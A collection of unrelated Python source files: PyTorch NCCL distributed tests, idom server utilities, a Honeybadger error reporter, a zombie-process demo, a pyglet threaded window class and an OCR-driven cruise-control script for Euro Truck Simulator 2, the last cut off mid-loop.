if run_checkpoint:
output = checkpoint(model, input_var)
else:
output = model(input_var)
l = loss(output, target)
l.backward()
def _test_ddp_checkpointing(
self,
input_model,
process_group,
use_bucket_view,
find_unused_parameters=False,
static_graph=False,
run_checkpoint=False,
):
# To reproduce the same training results
torch.cuda.set_device(self.rank)
torch.manual_seed(31415)
model = copy.deepcopy(input_model).cuda()
ddp_model = copy.deepcopy(input_model).cuda()
ddp_model = nn.parallel.DistributedDataParallel(
ddp_model,
bucket_cap_mb=1,
gradient_as_bucket_view=use_bucket_view,
device_ids=[self.rank],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
)
if static_graph:
ddp_model._set_static_graph()
self.assertEqual(
ddp_model._get_ddp_logging_data().get("static_graph", 0), static_graph
)
input, ddp_input, target, ddp_target = self._prepare_dummy_data()
loss = nn.MSELoss()
for i in range(5):
model.zero_grad(set_to_none=False)
ddp_model.zero_grad(set_to_none=False)
self._train_model(model, input, target, loss, run_checkpoint=run_checkpoint)
self._train_model(
ddp_model, ddp_input, ddp_target, loss, run_checkpoint=run_checkpoint
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertTrue(i.grad is not None)
self.assertTrue(j.grad is not None)
self.assertEqual(i.grad, j.grad, rtol=1.3e-06, atol=5e-5)
# DDP works as expected when a layer is checkpointed only once
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_once(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view, static_graph in product((False, True), (False, True)):
self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
)
# DDP will fail when there are unused_parameters in the model
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_unused_params(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=False,
)
# test passes when static_graph is true
model = self._test_ddp_checkpointing(
self.CheckpointOnceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
find_unused_parameters=True,
static_graph=True,
)
# DDP will fail when the same layer is checkpointed twice
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_twice(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
for use_bucket_view in (True, False):
with self.assertRaisesRegex(
RuntimeError,
"Expected to mark a variable ready only once.",
):
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=False,
)
model = self._test_ddp_checkpointing(
self.CheckpointTwiceModule(),
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=True,
)
# DDP works as expected if there is weight sharing among layers
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_checkpointing_weight_sharing(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
torch.cuda.set_device(self.rank)
for use_bucket_view, static_graph in product((False, True), (False, True)):
torch.manual_seed(31415)
l1 = nn.Linear(20, 20)
l2 = nn.Linear(20, 20)
l1.weight = l2.weight
model = nn.Sequential(l1, l2)
self._test_ddp_checkpointing(
model,
process_group=process_group,
use_bucket_view=use_bucket_view,
static_graph=static_graph,
run_checkpoint=True,
)
class NcclErrorHandlingTest(MultiProcessTestCase):
def setUp(self):
super(NcclErrorHandlingTest, self).setUp()
# Need to skip return code checking for these tests since the child
# processes don't exit cleanly.
self.skip_return_code_checks = [
self.test_nccl_errors_blocking_abort.__wrapped__,
self.test_nccl_errors_blocking_sigkill.__wrapped__,
self.test_nccl_errors_blocking_sigterm.__wrapped__,
self.test_nccl_errors_blocking_nonzero_exit.__wrapped__,
]
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def tearDown(self):
super(NcclErrorHandlingTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
@property
def op_timeout_sec(self):
return 1
@property
def world_size(self):
return 3
@property
def blocking_wait_error_msg(self):
return "Caught collective operation timeout"
def _run_all_reduce(self, pg):
pg.allreduce(torch.rand(10).cuda(self.rank))
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_nonblocking(self):
# Note: we unset and restore NCCL_ASYNC_ERROR_HANDLING for this test
# since test_c10d_common runs with async error handling by default, but this
# tests behavior when it is not enabled.
prev_nccl_async_error_handling = os.environ.get(
"NCCL_ASYNC_ERROR_HANDLING", None
)
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "0"
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
# This allreduce does not block the Python thread, since allreduce only
# enqueues the CUDA operation and wait() only blocks the current CUDA
# stream.
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
work.wait()
# Now the work scheduled next should hang forever since the previous
# allreduce will never complete.
t = threading.Thread(target=self._run_all_reduce, args=(process_group,))
t.daemon = True
t.start()
t.join(int(get_timeout(self.id()) / 5))
self.assertTrue(t.is_alive())
if prev_nccl_async_error_handling is not None:
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = prev_nccl_async_error_handling
def _test_nccl_errors_blocking(self, func):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.allreduce(torch.rand(10).cuda(self.rank))
if self.rank == 0:
work = process_group.allreduce(torch.rand(10).cuda(self.rank))
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# Operation would time out in blocking mode.
work.wait()
# Run some GPU operations to make sure CUDA has not gotten stuck.
# It was observed that CUDA could get stuck if NCCL communicators were
# not properly aborted before throwing the RuntimeError.
a = torch.rand(10).cuda(self.rank)
elif self.rank == 1:
# Clean up structures (e.g., the FileStore's files) before going down
del process_group
func()
else:
# Wait for timeout
time.sleep(2 * self.op_timeout_sec)
# Now verify communicators on this rank have been aborted by the watchdog thread.
self._wait_for_comm_abort(process_group)
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_clean_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(0))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_nonzero_exit(self):
self._test_nccl_errors_blocking(lambda: sys.exit(1))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
@sandcastle_skip(
"Frequently times out see https://github.com/pytorch/pytorch/issues/58920"
)
def test_nccl_errors_blocking_abort(self):
self._test_nccl_errors_blocking(lambda: os.abort())
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigkill(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGKILL))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
@skip_if_rocm
def test_nccl_errors_blocking_sigterm(self):
self._test_nccl_errors_blocking(lambda: os.kill(os.getpid(), signal.SIGTERM))
@with_nccl_blocking_wait
@requires_nccl()
@requires_nccl_version((2, 4, 0), "Need NCCL 2.4+ for error checking")
@skip_if_lt_x_gpu(3)
def test_nccl_blocking_wait_with_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(
store,
self.rank,
self.world_size,
timeout=timedelta(seconds=self.op_timeout_sec),
)
process_group.barrier().wait()
if self.rank == 0:
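# Only rank 0 issues this second barrier; the other ranks never match it,
# so the blocking wait is expected to time out.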
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
# This should timeout
process_group.barrier().wait()
def _run_invalid_nccl_blocking_wait_env(self, val):
os.environ["NCCL_BLOCKING_WAIT"] = val
store = c10d.FileStore(self.file_name, self.world_size)
with self.assertRaises(RuntimeError):
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_invalid_nccl_blocking_wait_env(self):
self._run_invalid_nccl_blocking_wait_env("abc")
self._run_invalid_nccl_blocking_wait_env("-1")
self._run_invalid_nccl_blocking_wait_env("2147483647")
self._run_invalid_nccl_blocking_wait_env("4294967295")
def _wait_for_comm_abort(self, process_group):
"""
Waits for the watchdog thread to abort communicators for the process group.
"""
while True:
try:
process_group.allreduce(torch.rand(10).cuda(self.rank))
except Exception as e:
if "NCCL communicator was aborted" in str(e):
return
else:
raise e
time.sleep(1)
@with_nccl_blocking_wait
@requires_nccl()
@skip_if_lt_x_gpu(3)
def test_nccl_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
# Initialize process_group.
timeout = 1
process_group = c10d.ProcessGroupNCCL(
store, self.rank, self.world_size, timeout=timedelta(seconds=timeout)
)
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
if self.rank == 0:
# This should timeout in about 1 second.
start = time.time()
# The watchdog may abort the timed-out work, resulting in an NCCL error instead of an operation-timeout error.
with self.assertRaisesRegex(RuntimeError, self.blocking_wait_error_msg):
process_group.allreduce(torch.rand(10).cuda(self.rank)).wait()
else:
# Sleep to ensure timeout.
time.sleep(2 * timeout)
self._wait_for_comm_abort(process_group)
class CommTest(test_c10d_common.AbstractCommTest, MultiProcessTestCase):
def setUp(self):
super(CommTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def tearDown(self):
super(CommTest, self).tearDown()
try:
os.remove(self.file_name)
except OSError:
pass
def _test_broadcast_coalesced(self, process_group, device, root_rank):
half = torch.float16
# No support for float16 for CPU tensors
if device == torch.device("cpu"):
half = torch.float32
target = torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float64, device=device).chunk(5)
target += torch.arange(60, dtype=half, device=device).chunk(5)
target += torch.arange(60, dtype=torch.float32, device=device).chunk(5)
# The tensors to pass to broadcast are identical to the target
# only on the process that is the root of the broadcast.
if self.rank == root_rank:
tensors = list(tensor.clone() for tensor in target)
else:
tensors = list(torch.zeros_like(tensor) for tensor in target)
if self.rank != root_rank:
self.assertNotEqual(tensors, target)
c10d._broadcast_coalesced(
process_group, tensors, buffer_size=256, src=root_rank
)
if self.rank != root_rank:
self.assertEqual(tensors, target)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_broadcast_coalesced_nccl(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
device = torch.device("cuda:%d" % self.rank)
ranks = [0, 1]
for root_rank in ranks:
self._test_broadcast_coalesced(process_group, device, root_rank)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_default_pg_nccl(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_default_pg(backend="nccl")
@skip_if_lt_x_gpu(2)
@requires_nccl()
def test_sequence_num_incremented_nccl_default(self):
self._test_sequence_num_incremented_default_group("nccl")
@skip_if_lt_x_gpu(4)
@requires_nccl()
def test_sequence_num_incremented_nccl_subgroup(self):
if self.world_size < 4:
return sandcastle_skip("Test requires world_size of at least 4")
self._test_sequence_num_incremented_subgroup("nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_sequence_num_set_nccl_new_group(self):
torch.cuda.set_device(self.rank)
self._test_sequence_num_set_new_group(backend="nccl")
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_pass_nccl_options_high_priority_stream(self):
pg_opts = c10d.ProcessGroupNCCL.Options()
pg_opts.is_high_priority_stream = True
store = c10d.FileStore(self.file_name, self.world_size)
# Test init_process_group accepts options
dist.init_process_group(
"nccl",
world_size=self.world_size,
rank=self.rank,
store=store,
pg_options=pg_opts,
)
# Test with new_group
pg = c10d.new_group([0, 1], pg_options=pg_opts)
# test if the process group constructed with high priority stream
self.assertTrue(pg.options.is_high_priority_stream)
# test the process group works as expected
t = torch.tensor([self.rank + 1] * 10).cuda(self.rank)
pg.allreduce(t).wait()
expected_tensor = torch.tensor([3] * 10).cuda(self.rank)
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
c10d.all_reduce(t)
expected_tensor = torch.tensor([3] * 10).cuda(2 * self.rank)
self.assertEqual(expected_tensor, t)
# Test with new_group
pg = c10d.new_group([0, 1])
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([0])
if self.rank == 0:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
pg = c10d.new_group([1])
if self.rank == 1:
t = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
expected_tensor = torch.tensor([self.rank + 1] * 10).cuda(2 * self.rank)
pg.allreduce(t).wait()
self.assertEqual(expected_tensor, t)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout(self):
store = c10d.FileStore(self.file_name, self.world_size)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 0:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_barrier_timeout_new_group_non_member(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl",
rank=self.rank,
world_size=self.world_size,
store=store,
timeout=timedelta(seconds=1),
)
if self.rank == 1:
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0, 1], timeout=timedelta(seconds=1))
with self.assertRaisesRegex(
RuntimeError, "Timed out initializing process group"
):
c10d.new_group([0], timeout=timedelta(seconds=1))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
c10d.barrier(device_ids=[self.rank])
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_barrier_device_ids_function_argument(self):
store = c10d.FileStore(self.file_name, self.world_size)
c10d.init_process_group(
backend="nccl", rank=self.rank, world_size=self.world_size, store=store
)
with self.assertRaisesRegex(RuntimeError, "Invalid function argument"):
c10d.barrier(device_ids=self.rank)
if __name__ == "__main__":
assert (
not torch.cuda._initialized
), "test_distributed must not have initialized CUDA context on main process"
run_tests()
|
utils.py
|
import asyncio
import socket
import time
from contextlib import closing
from functools import wraps
from importlib import import_module
from pathlib import Path
from threading import Event, Thread
from typing import Any, Callable, List, Optional
from typing_extensions import ParamSpec
import idom
from .proto import ServerFactory
CLIENT_BUILD_DIR = Path(idom.__file__).parent / "client"
_SUPPORTED_PACKAGES = [
"sanic",
"fastapi",
"flask",
"tornado",
"starlette",
]
_FuncParams = ParamSpec("_FuncParams")
def threaded(function: Callable[_FuncParams, None]) -> Callable[_FuncParams, Thread]:
@wraps(function)
def wrapper(*args: Any, **kwargs: Any) -> Thread:
def target() -> None:
asyncio.set_event_loop(asyncio.new_event_loop())
function(*args, **kwargs)
thread = Thread(target=target, daemon=True)
thread.start()
return thread
return wrapper
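# Illustrative usage (hypothetical function name): a callable decorated with
# @threaded runs in its own daemon thread with a fresh event loop, and the call
# returns the Thread object immediately, e.g.
#
#     @threaded
#     def serve_forever() -> None:
#         ...  # long-running server loop
#
#     thread = serve_forever()  # non-blocking; use wait_on_event/poll to sync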
def wait_on_event(description: str, event: Event, timeout: Optional[float]) -> None:
if not event.wait(timeout):
raise TimeoutError(f"Did not {description} within {timeout} seconds")
def poll(
description: str,
frequency: float,
timeout: Optional[float],
function: Callable[[], bool],
) -> None:
if timeout is not None:
expiry = time.time() + timeout
while not function():
if time.time() > expiry:
raise TimeoutError(f"Did not {description} within {timeout} seconds")
time.sleep(frequency)
else:
while not function():
time.sleep(frequency)
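# Example (hypothetical predicate): wait up to 5 seconds, checking every 100ms,
# e.g. poll("connect to the server", 0.1, 5, lambda: server_is_up())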
def find_builtin_server_type(type_name: str) -> ServerFactory[Any, Any]:
"""Find first installed server implementation
Raises:
:class:`RuntimeError` if one cannot be found
"""
installed_builtins: List[str] = []
for name in _SUPPORTED_PACKAGES:
try:
import_module(name)
except ImportError: # pragma: no cover
continue
else:
builtin_module = import_module(f"idom.server.{name}")
installed_builtins.append(builtin_module.__name__)
try:
return getattr(builtin_module, type_name) # type: ignore
except AttributeError: # pragma: no cover
pass
else: # pragma: no cover
if not installed_builtins:
raise RuntimeError(
f"Found none of the following builtin server implementations {_SUPPORTED_PACKAGES}"
)
else:
raise ImportError(
f"No server type {type_name!r} found in installed implementations {installed_builtins}"
)
def find_available_port(
host: str,
port_min: int = 8000,
port_max: int = 9000,
allow_reuse_waiting_ports: bool = True,
) -> int:
"""Get a port that's available for the given host and port range"""
for port in range(port_min, port_max):
with closing(socket.socket()) as sock:
try:
if allow_reuse_waiting_ports:
# As per this answer: https://stackoverflow.com/a/19247688/3159288
# setting can be somewhat unreliable because we allow the use of
# ports that are stuck in TIME_WAIT. However, not setting the option
# means we're overly cautious and almost always use a different addr
# even if it could have actually been used.
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((host, port))
except OSError:
pass
else:
return port
raise RuntimeError(
f"Host {host!r} has no available port in range {port_max}-{port_max}"
)
|
connection.py
|
import logging
import json
import threading
from six.moves.urllib import request
from six import b
from .utils import StringReprJSONEncoder
logger = logging.getLogger(__name__)
def send_notice(config, payload):
request_object = request.Request(url="{}/v1/notices/".format(config.endpoint),
data=b(json.dumps(payload, cls=StringReprJSONEncoder)))
if not config.api_key:
logger.error("Honeybadger API key missing from configuration: cannot report errors.")
return
request_object.add_header('X-Api-Key', config.api_key)
request_object.add_header('Content-Type', 'application/json')
request_object.add_header('Accept', 'application/json')
def send_request():
response = request.urlopen(request_object)
status = response.getcode()
if status != 201:
logger.error("Received error response [{}] from Honeybadger API.".format(status))
if config.force_sync:
send_request()
else:
t = threading.Thread(target=send_request)
t.start()
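# Note: unless config.force_sync is set, the notice is posted from a background
# thread, so send_notice() returns immediately and a non-201 response is only
# reported through the logger.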
|
僵尸进程处理.py
|
"""
Zombie process demo
"""
from multiprocessing import Process
from time import sleep
import os
from signal import *
signal(SIGCHLD, SIG_IGN)  # sever the parent/child link so the OS reaps children itself
def fun():
print("Starting a task", os.getpid())
sleep(1)
print("Task finished")
# Each call to start() first cleans up any zombies that have already appeared
p1 = Process(target=fun)
p1.start()
sleep(3)
p2 = Process(target=fun)
p2.start()
# Starting several children at once without reaping them would normally leave multiple zombies
p1 = Process(target=fun)
p2 = Process(target=fun)
p1.start()
p2.start()
# Why zombie processes appear on Linux (they do not occur on Windows):
# when a child process dies, the OS sends a signal to notify the parent; if the
# parent does not handle it (no join), the child becomes a zombie.
# So we can also use signal to sever the parent/child link: the OS then does not
# notify the parent and instead reclaims the child itself.
# Orphan processes are reclaimed by the OS on their own.
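# Alternative sketch (not part of the demo above): instead of ignoring SIGCHLD,
# the parent can reap children explicitly, e.g. by calling p1.join() once the
# work is done, or by installing a SIGCHLD handler that loops over
# os.waitpid(-1, os.WNOHANG) until no more dead children remain.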
|
managed_window.py
|
from pyglet.window import Window
from pyglet.clock import Clock
from threading import Thread, Lock
gl_lock = Lock()
class ManagedWindow(Window):
"""
A pyglet window with an event loop which executes automatically
in a separate thread. Behavior is added by creating a subclass
which overrides setup, update, and/or draw.
"""
fps_limit = 30
default_win_args = dict(width=600,
height=500,
vsync=False,
resizable=True)
def __init__(self, **win_args):
"""
It is best not to override this function in the child
class, unless you need to take additional arguments.
Do any OpenGL initialization calls in setup().
"""
# check if this is run from the doctester
if win_args.get('runfromdoctester', False):
return
self.win_args = dict(self.default_win_args, **win_args)
self.Thread = Thread(target=self.__event_loop__)
self.Thread.start()
def __event_loop__(self, **win_args):
"""
The event loop thread function. Do not override or call
directly (it is called by __init__).
"""
gl_lock.acquire()
try:
try:
super().__init__(**self.win_args)
self.switch_to()
self.setup()
except Exception as e:
print("Window initialization failed: %s" % (str(e)))
self.has_exit = True
finally:
gl_lock.release()
clock = Clock()
clock.fps_limit = self.fps_limit
while not self.has_exit:
dt = clock.tick()
gl_lock.acquire()
try:
try:
self.switch_to()
self.dispatch_events()
self.clear()
self.update(dt)
self.draw()
self.flip()
except Exception as e:
print("Uncaught exception in event loop: %s" % str(e))
self.has_exit = True
finally:
gl_lock.release()
super().close()
def close(self):
"""
Closes the window.
"""
self.has_exit = True
def setup(self):
"""
Called once before the event loop begins.
Override this method in a child class. This
is the best place to put things like OpenGL
initialization calls.
"""
pass
def update(self, dt):
"""
Called before draw during each iteration of
the event loop. dt is the elapsed time in
seconds since the last update. OpenGL rendering
calls are best put in draw() rather than here.
"""
pass
def draw(self):
"""
Called after update during each iteration of
the event loop. Put OpenGL rendering calls
here.
"""
pass
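# Illustrative subclass (hypothetical names): behavior is added by overriding
# the three hooks, e.g.
#
#     class SpinningTriangle(ManagedWindow):
#         def setup(self):          # one-time OpenGL state setup
#             ...
#         def update(self, dt):     # advance the animation by dt seconds
#             ...
#         def draw(self):           # issue the OpenGL draw calls
#             ...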
if __name__ == '__main__':
ManagedWindow()
|
app.py
|
import numpy as np
import cv2
from PIL import Image, ImageTk
import keyboard
import pytesseract
import re
import pyWinhook
import threading
from time import sleep, perf_counter
import math
import tkinter as tk
import mss
digit_regex = r'\d+'
offset = 0.05 # km/h to go above (or below if negative) the speed limit
step = 2 # must match the "Cruise control grid step" setting
# 1080p
# current_speed_box = (1490, 710, 1525, 730)
# speed_limit_box = (1500, 780, 1525, 805)
# 1440p
current_speed_box = (1985, 945, 2050, 975)
speed_limit_box = (2000, 1040, 2033, 1075)
key_accel = 'w'
key_brake = 's'
key_cruise = 'c'
key_cruise_up = 'h'
key_cruise_dwn = 'n'
should_execute = False
running = True
current_speed = 0
speed_limit = 0
braking = False
accelerating = False
current_cruise = 0
minimum_cruise = 30 # km/h, minimum speed at which cruise can be enabled
maximum_cruise = 90 # km/h, maximum speed at which cruise can go up to
log_file = open('log.csv', 'w')
log_file.write('Speed, Limit, Cruise, Enabled, Accel, Brake\n')
# UI elements
dirty_ui = False
latest_speed_img = None
latest_limit_img = None
window = tk.Tk()
enabled_lbl = tk.Label(text=f'Enabled: {should_execute}')
cur_speed_lbl = tk.Label(text=f'Current: {current_speed}')
speed_limit_lbl = tk.Label(text=f'Limit: {speed_limit}')
cur_cruise_lbl = tk.Label(text=f'Cruise: {current_cruise}')
accel_lbl = tk.Label(text=f'Accelerating: {accelerating}')
braking_lbl = tk.Label(text=f'Braking: {braking}')
speed_img_lbl = tk.Label()
limit_img_lbl = tk.Label()
# /UI elements
def determine_commands(current, limit, cruise_active, cruise):
accelerate = (current < minimum_cruise)
brake = False #(current > (limit + 5))
# print(f'Accel: {accelerate} Brake: {brake}')
working_offset = offset if offset >= 1 else math.ceil(offset*limit) # either use the offset as-is, or if a fraction then use it as a % of the limit
working_limit = min(limit + working_offset, maximum_cruise)
increase_cruise = cruise_active and cruise < working_limit
decrease_cruise = cruise_active and (cruise - step) >= working_limit
activate_cruise = not cruise_active and current >= minimum_cruise
return accelerate, brake, activate_cruise, increase_cruise, decrease_cruise
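# Worked example (with the defaults above: offset=0.05, step=2, maximum_cruise=90):
# at limit=80 the fractional offset gives working_offset=ceil(0.05*80)=4, so
# working_limit=min(84, 90)=84 and the cruise setting is nudged up in steps of 2
# until it reaches 84.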
def execute_commands(accel, brake, enCruise, upCruise, dwnCruise):
global current_cruise
if accel: keyboard.press(key_accel)
if brake: keyboard.press(key_brake)
if enCruise:
keyboard.press_and_release(key_cruise)
current_cruise = current_speed
if upCruise:
keyboard.press_and_release(key_cruise_up)
current_cruise += step
if dwnCruise:
keyboard.press_and_release(key_cruise_dwn)
current_cruise -= step
if not accel: keyboard.release(key_accel)
if not brake: keyboard.release(key_brake)
def OnKeyboardEvent(event):
# print('MessageName:',event.MessageName)
# print('Message:',event.Message)
# print('Time:',event.Time)
# print('Window:',event.Window)
# print('WindowName:',event.WindowName)
# print('Ascii:', event.Ascii, chr(event.Ascii))
# print('Key:', event.Key)
# print('KeyID:', event.KeyID)
# print('ScanCode:', event.ScanCode)
# print('Extended:', event.Extended)
# print('Injected:', event.Injected)
# print('Alt', event.Alt)
# print('Transition', event.Transition)
# print('---')
if (event.WindowName == 'Euro Truck Simulator 2' and event.Key == 'Z'):
#print('Key:', event.Key)
global should_execute
global dirty_ui
global current_cruise
dirty_ui = True
should_execute = not should_execute
if not should_execute: current_cruise = 0
execute_commands(False, False, False, False, False)
# return True to pass the event to other handlers
return True
# def pump_thread():
# pythoncom.PumpMessages()
def cv_img_to_tk(src):
img = cv2.cvtColor(src, cv2.COLOR_BGR2RGB)
img = Image.fromarray(img)
return ImageTk.PhotoImage(img)
def extract_current_speed():
cur_raw = sct.grab(current_speed_box)
cur_speed_img = np.array(cur_raw)
cur_speed_img = cv2.cvtColor(cur_speed_img, cv2.COLOR_RGB2GRAY)
cur_speed_img = cv2.threshold(cur_speed_img, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]
# t_grab_speed = perf_counter()-start_timer
speed = -1
try:
current_ocr = pytesseract.image_to_string(cur_speed_img, config='--psm 7 --oem 3 -c tessedit_char_whitelist=0123456789')
speed = int(re.match(digit_regex, current_ocr)[0])
except:
pass
return speed, cur_speed_img
# t_calc_speed = perf_counter()-start_timer
def extract_current_limit():
limit_raw = sct.grab(speed_limit_box)
speed_limit_img = np.array(limit_raw)
speed_limit_img = cv2.cvtColor(speed_limit_img, cv2.COLOR_RGB2GRAY)
speed_limit_img = cv2.threshold(speed_limit_img, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]
latest_limit_img = speed_limit_img
# t_grab_limit = perf_counter()-start_timer
limit = -1
try:
limit_ocr = pytesseract.image_to_string(speed_limit_img, config='--psm 8 --oem 3 -c tessedit_char_whitelist=0123456789')
limit = int(re.match(digit_regex, limit_ocr)[0])
except:
pass
return limit, speed_limit_img
def current_speed_thread():
global current_speed
global latest_speed_img
global dirty_ui
while running:
prev_speed = current_speed
(speed, latest_speed_img) = extract_current_speed()
if speed > 100 or speed < 0: speed = prev_speed # safety
current_speed = speed
if speed != prev_speed: dirty_ui = True
def speed_limit_thread():
global speed_limit
global latest_limit_img
global dirty_ui
while running:
prev_limit = speed_limit
(limit, latest_limit_img) = extract_current_limit()
if limit > 100 or limit < 1: limit = prev_limit
speed_limit = limit
if limit != prev_limit: dirty_ui = True
def work_thread():
global braking
global accelerating
global dirty_ui
global current_cruise
sleep_time = 1 / 30 # 30 ops per second, ideally
counter = 5
counter_timer = perf_counter()
limit_count = 5
while running:
start_timer = perf_counter()
counter += 1
was_accel = accelerating
was_brake = braking
was_cruise = current_cruise > 0
(accelerating, braking, enCruise, upCruise, dwnCruise) = determine_commands(current_speed, speed_limit, was_cruise, current_cruise)
# t_determine = perf_counter()-start_timer
if should_execute:
execute_commands(accelerating, braking, enCruise, upCruise, dwnCruise)
# t_execute = perf_counter()-start_timer
if was_accel != accelerating or was_brake != braking: dirty_ui = True
if dirty_ui:
en = 1 if should_execute else 0
ac = 1 if accelerating else 0
br = 1 if braking else 0
log_file.write(f'{current_speed}, {speed_limit}, {current_cruise}, {en}, {ac}, {br}\n') # only need to log any changes
# t_log = perf_counter()-start_timer
end_timer = perf_counter()-start_timer
if counter >= limit_count: # only check limit infrequently
